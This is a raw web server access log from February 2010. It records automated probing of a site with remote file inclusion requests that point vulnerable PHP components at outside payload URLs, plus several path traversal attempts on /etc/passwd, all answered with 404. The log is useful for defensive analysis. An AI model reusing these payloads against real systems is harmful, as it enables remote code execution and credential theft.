72.44.84.221 - - [18/Feb/2010:08:53:24 -0800] "GET /logs/access_100125.log/?board_skin_path=http://80.59.61.12/id.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
194.63.235.157 - - [18/Feb/2010:08:55:11 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://ufaeda.ru//poll/id.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.63.235.157 - - [18/Feb/2010:08:55:11 -0800] "GET /logs/access_100122.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://ufaeda.ru//poll/id.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.63.235.157 - - [18/Feb/2010:08:55:11 -0800] "GET /logs/access_100111.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://ufaeda.ru//poll/id.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.63.235.157 - - [18/Feb/2010:08:55:11 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://ufaeda.ru//poll/id.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.63.235.157 - - [18/Feb/2010:08:55:19 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://ufaeda.ru//poll/id.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.63.235.157 - - [18/Feb/2010:08:55:19 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://ufaeda.ru//poll/id.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.63.235.157 - - [18/Feb/2010:08:55:19 -0800] "GET /logs/access_100111.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://ufaeda.ru//poll/id.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.63.235.157 - - [18/Feb/2010:08:55:19 -0800] "GET /logs/access_100122.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://ufaeda.ru//poll/id.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.63.235.157 - - [18/Feb/2010:08:55:26 -0800] "GET /logs/access_100111.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://ufaeda.ru//poll/id.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.63.235.157 - - [18/Feb/2010:08:55:26 -0800] "GET /logs/access_100122.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://ufaeda.ru//poll/id.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.63.235.157 - - [18/Feb/2010:08:55:26 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://ufaeda.ru//poll/id.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.63.235.157 - - [18/Feb/2010:08:55:26 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://ufaeda.ru//poll/id.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.63.235.157 - - [18/Feb/2010:08:56:32 -0800] "GET /logs/access_100122.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://ufaeda.ru//poll/id.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.63.235.157 - - [18/Feb/2010:08:56:32 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://ufaeda.ru//poll/id.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.63.235.157 - - [18/Feb/2010:08:56:32 -0800] "GET /logs/access_100111.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://ufaeda.ru//poll/id.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.63.235.157 - - [18/Feb/2010:08:56:32 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://ufaeda.ru//poll/id.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.183.77.248 - - [18/Feb/2010:08:56:42 -0800] "GET /modules/My_eGallery/index.php?basepath=http://www.neosemitech.com/board/data/session/f10/des/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.183.77.248 - - [18/Feb/2010:08:56:42 -0800] "GET /logs/access_100114.log%20%20/modules/My_eGallery/index.php?basepath=http://www.neosemitech.com/board/data/session/f10/des/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.183.77.248 - - [18/Feb/2010:08:56:45 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.neosemitech.com/board/data/session/f10/des/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.77.220 - - [18/Feb/2010:08:57:16 -0800] "GET /logs/access_100112.log/module_db.php?pivot_path=http://alienweb-irc.net/gossid?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.77.220 - - [18/Feb/2010:08:57:16 -0800] "GET /module_db.php?pivot_path=http://alienweb-irc.net/gossid?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.77.220 - - [18/Feb/2010:08:57:16 -0800] "GET /logs/module_db.php?pivot_path=http://alienweb-irc.net/gossid?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.77.220 - - [18/Feb/2010:08:57:39 -0800] "GET /logs/module_db.php?pivot_path=http://alienweb-irc.net/gossid?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.77.220 - - [18/Feb/2010:08:57:39 -0800] "GET /module_db.php?pivot_path=http://alienweb-irc.net/gossid?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.77.220 - - [18/Feb/2010:08:57:39 -0800] "GET /logs/access_100112.log/module_db.php?pivot_path=http://alienweb-irc.net/gossid?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.186.58.214 - - [18/Feb/2010:08:57:55 -0800] "GET /logs/access_100112.log/module_db.php?pivot_path=http://alienweb-irc.net/gossid?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.186.58.214 - - [18/Feb/2010:08:57:55 -0800] "GET /logs/module_db.php?pivot_path=http://alienweb-irc.net/gossid?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.186.58.214 - - [18/Feb/2010:08:57:55 -0800] "GET /module_db.php?pivot_path=http://alienweb-irc.net/gossid?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.63.235.157 - - [18/Feb/2010:08:58:23 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://ufaeda.ru//poll/id.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.63.235.157 - - [18/Feb/2010:08:58:23 -0800] "GET /logs/access_100122.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://ufaeda.ru//poll/id.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.63.235.157 - - [18/Feb/2010:08:58:23 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://ufaeda.ru//poll/id.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.63.235.157 - - [18/Feb/2010:08:58:23 -0800] "GET /logs/access_100111.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://ufaeda.ru//poll/id.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [18/Feb/2010:08:59:08 -0800] "GET /bbs/skin/ggambo6010_music/sendmail.php=http://www.hochsauerlandferien.de/nw/data/images/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [18/Feb/2010:08:59:08 -0800] "GET /logs//bbs/skin/ggambo6010_music/sendmail.php=http://www.hochsauerlandferien.de/nw/data/images/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [18/Feb/2010:08:59:08 -0800] "GET /logs/access_100126.log%20%20//bbs/skin/ggambo6010_music/sendmail.php=http://www.hochsauerlandferien.de/nw/data/images/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.183.77.248 - - [18/Feb/2010:08:59:14 -0800] "GET /logs/access_100105.log%20%20/modules/My_eGallery/index.php?basepath=http://www.neosemitech.com/board/data/session/f10/des/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.183.77.248 - - [18/Feb/2010:08:59:30 -0800] "GET /modules/My_eGallery/index.php?basepath=http://www.neosemitech.com/board/data/session/f10/des/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.183.77.248 - - [18/Feb/2010:08:59:37 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.neosemitech.com/board/data/session/f10/des/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.183.77.248 - - [18/Feb/2010:08:59:37 -0800] "GET /logs/access_100114.log/modules/My_eGallery/index.php?basepath=http://www.neosemitech.com/board/data/session/f10/des/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.183.77.248 - - [18/Feb/2010:08:59:37 -0800] "GET /modules/My_eGallery/index.php?basepath=http://www.neosemitech.com/board/data/session/f10/des/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.183.77.248 - - [18/Feb/2010:08:59:37 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.neosemitech.com/board/data/session/f10/des/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.183.77.248 - - [18/Feb/2010:08:59:37 -0800] "GET /logs/access_100114.log/modules/My_eGallery/index.php?basepath=http://www.neosemitech.com/board/data/session/f10/des/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.183.77.248 - - [18/Feb/2010:09:00:08 -0800] "GET /logs/access_100111.log//ashnews.php?pathtoashnews=http://www.neosemitech.com/board/data/session/f10/des/copyright.txt???? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.183.77.248 - - [18/Feb/2010:09:00:08 -0800] "GET /logs//ashnews.php?pathtoashnews=http://www.neosemitech.com/board/data/session/f10/des/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.183.77.248 - - [18/Feb/2010:09:00:08 -0800] "GET /ashnews.php?pathtoashnews=http://www.neosemitech.com/board/data/session/f10/des/copyright.txt???? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.183.77.248 - - [18/Feb/2010:09:00:08 -0800] "GET /logs/access_100114.log//ashnews.php?pathtoashnews=http://www.neosemitech.com/board/data/session/f10/des/copyright.txt???? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.145.178 - - [18/Feb/2010:09:00:21 -0800] "GET /login.php?dir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.145.178 - - [18/Feb/2010:09:00:21 -0800] "GET /logs//login.php?dir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.145.178 - - [18/Feb/2010:09:01:00 -0800] "GET /logs/access_100112.log//login.php?dir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.183.77.248 - - [18/Feb/2010:09:01:24 -0800] "GET /logs/access_100105.log/modules/My_eGallery/index.php?basepath=http://www.neosemitech.com/board/data/session/f10/des/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.183.77.248 - - [18/Feb/2010:09:01:42 -0800] "GET /ashnews.php?pathtoashnews=http://www.neosemitech.com/board/data/session/f10/des/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.183.77.248 - - [18/Feb/2010:09:01:42 -0800] "GET /logs//ashnews.php?pathtoashnews=http://www.neosemitech.com/board/data/session/f10/des/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.183.77.248 - - [18/Feb/2010:09:01:42 -0800] "GET /logs/access_100128.log//ashnews.php?pathtoashnews=http://www.neosemitech.com/board/data/session/f10/des/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.183.77.248 - - [18/Feb/2010:09:01:46 -0800] "GET /ashnews.php?pathtoashnews=http://www.neosemitech.com/board/data/session/f10/des/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.183.77.248 - - [18/Feb/2010:09:01:46 -0800] "GET /logs//ashnews.php?pathtoashnews=http://www.neosemitech.com/board/data/session/f10/des/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.145.178 - - [18/Feb/2010:09:02:01 -0800] "GET /logs/access_100201.log%20%20//login.php?dir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.183.77.248 - - [18/Feb/2010:09:02:07 -0800] "GET /logs/access_100114.log%20%20//ashnews.php?pathtoashnews=http://www.neosemitech.com/board/data/session/f10/des/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.145.178 - - [18/Feb/2010:09:02:08 -0800] "GET /logs/access_100112.log%20%20//login.php?dir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.225.152.137 - - [18/Feb/2010:09:03:00 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 5258 "-" "-" "www.puaga.com"
67.225.152.137 - - [18/Feb/2010:09:03:00 -0800] "GET /logs/access_100203.log%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 5258 "-" "-" "www.puaga.com"
67.225.152.137 - - [18/Feb/2010:09:03:01 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 5258 "-" "-" "www.puaga.com"
67.225.152.137 - - [18/Feb/2010:09:03:01 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=./../../../../../../../../etc/passwd HTTP/1.1" 404 5258 "-" "-" "www.puaga.com"
67.225.152.137 - - [18/Feb/2010:09:03:01 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=./../../../../../../../../etc/passwd HTTP/1.1" 404 5258 "-" "-" "www.puaga.com"
67.225.152.137 - - [18/Feb/2010:09:03:01 -0800] "GET /logs/access_100203.log%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=./../../../../../../../../etc/passwd HTTP/1.1" 404 5258 "-" "-" "www.puaga.com"
221.141.1.113 - - [18/Feb/2010:09:03:13 -0800] "GET /bbs/write_comment_update.php?board_skin_path=http://partner.waawaa.com//renewal/images/mywaa/mywaa_menu5.gif??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.141.1.113 - - [18/Feb/2010:09:03:13 -0800] "GET /logs//bbs/write_comment_update.php?board_skin_path=http://partner.waawaa.com//renewal/images/mywaa/mywaa_menu5.gif??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.141.1.113 - - [18/Feb/2010:09:03:26 -0800] "GET /logs/access_100202.log//bbs/write_comment_update.php?board_skin_path=http://partner.waawaa.com//renewal/images/mywaa/mywaa_menu5.gif??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.183.77.248 - - [18/Feb/2010:09:04:22 -0800] "GET /logs/access_100105.log/modules/My_eGallery/index.php?basepath=http://www.neosemitech.com/board/data/session/f10/des/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [18/Feb/2010:09:05:06 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/ID1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [18/Feb/2010:09:05:06 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/ID1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [18/Feb/2010:09:05:06 -0800] "GET /logs/access_100208.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/ID1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [18/Feb/2010:09:05:20 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [18/Feb/2010:09:05:20 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [18/Feb/2010:09:05:21 -0800] "GET /logs/access_100208.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [18/Feb/2010:09:05:24 -0800] "GET /logs/access_100109.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/ID1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [18/Feb/2010:09:05:27 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/ID1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [18/Feb/2010:09:05:27 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/ID1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [18/Feb/2010:09:05:27 -0800] "GET /logs/access_100208.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/ID1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [18/Feb/2010:09:05:37 -0800] "GET /logs/access_100109.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [18/Feb/2010:09:05:38 -0800] "GET /bbs/write_update.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [18/Feb/2010:09:05:38 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [18/Feb/2010:09:05:38 -0800] "GET /logs/access_100207.log%20%20//bbs/write_update.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [18/Feb/2010:09:05:39 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/ID1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [18/Feb/2010:09:05:40 -0800] "GET /logs/access_100203.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/ID1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [18/Feb/2010:09:05:40 -0800] "GET /logs/access_100208.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/ID1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [18/Feb/2010:09:05:44 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/ID1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.141.1.113 - - [18/Feb/2010:09:05:48 -0800] "GET /logs/access_100205.log//bbs/write_comment_update.php?board_skin_path=http://partner.waawaa.com//renewal/images/mywaa/mywaa_menu5.gif??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [18/Feb/2010:09:05:52 -0800] "GET /logs/access_100109.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/ID1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:09:06:11 -0800] "GET /logs/access_100125.log//bbs/delete_comment.php?board_skin_path=http://partner.waawaa.com//renewal/images/mywaa/mywaa_menu5.gif??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:09:07:10 -0800] "GET /logs/access_100120.log//bbs/delete_comment.php?board_skin_path=http://partner.waawaa.com//renewal/images/mywaa/mywaa_menu5.gif??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.242.224.19 - - [18/Feb/2010:09:10:18 -0800] "GET /errors.php?error=http://www.gzzsyy.com.cn/brd/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.242.224.19 - - [18/Feb/2010:09:10:22 -0800] "GET /logs/errors.php?error=http://www.gzzsyy.com.cn/brd/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.242.224.19 - - [18/Feb/2010:09:10:23 -0800] "GET /logs/access_100114.log%20%20/errors.php?error=http://www.gzzsyy.com.cn/brd/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [18/Feb/2010:09:10:50 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [18/Feb/2010:09:10:50 -0800] "GET /logs/access_100203.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [18/Feb/2010:09:10:51 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [18/Feb/2010:09:10:51 -0800] "GET /logs/access_100208.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [18/Feb/2010:09:11:13 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/ID1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [18/Feb/2010:09:11:13 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/ID1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [18/Feb/2010:09:11:13 -0800] "GET /logs/access_100208.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/ID1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [18/Feb/2010:09:11:21 -0800] "GET /logs/access_100203.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/ID1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.248.241.125 - - [18/Feb/2010:09:11:30 -0800] "GET /modules/My_eGallery/errors.php?error=http://www.gzzsyy.com.cn/brd/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.248.241.125 - - [18/Feb/2010:09:11:30 -0800] "GET /logs//modules/My_eGallery/errors.php?error=http://www.gzzsyy.com.cn/brd/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.248.241.125 - - [18/Feb/2010:09:11:30 -0800] "GET /logs/access_100114.log%20%20//modules/My_eGallery/errors.php?error=http://www.gzzsyy.com.cn/brd/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.248.241.125 - - [18/Feb/2010:09:12:27 -0800] "GET /logs/access_100105.log%20%20//modules/My_eGallery/errors.php?error=http://www.gzzsyy.com.cn/brd/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [18/Feb/2010:09:12:49 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [18/Feb/2010:09:12:49 -0800] "GET /logs/access_100204.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [18/Feb/2010:09:12:49 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.248.241.125 - - [18/Feb/2010:09:14:08 -0800] "GET /logs/access_100109.log%20%20//modules/My_eGallery/errors.php?error=http://www.gzzsyy.com.cn/brd/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.248.241.125 - - [18/Feb/2010:09:14:57 -0800] "GET /logs/access_100114.log//modules/My_eGallery/errors.php?error=http://www.gzzsyy.com.cn/brd/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.248.241.125 - - [18/Feb/2010:09:15:42 -0800] "GET /logs/access_100109.log//modules/My_eGallery/errors.php?error=http://www.gzzsyy.com.cn/brd/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.249.15.117 - - [18/Feb/2010:09:15:53 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.gzzsyy.com.cn/brd/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.249.15.117 - - [18/Feb/2010:09:15:53 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.gzzsyy.com.cn/brd/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
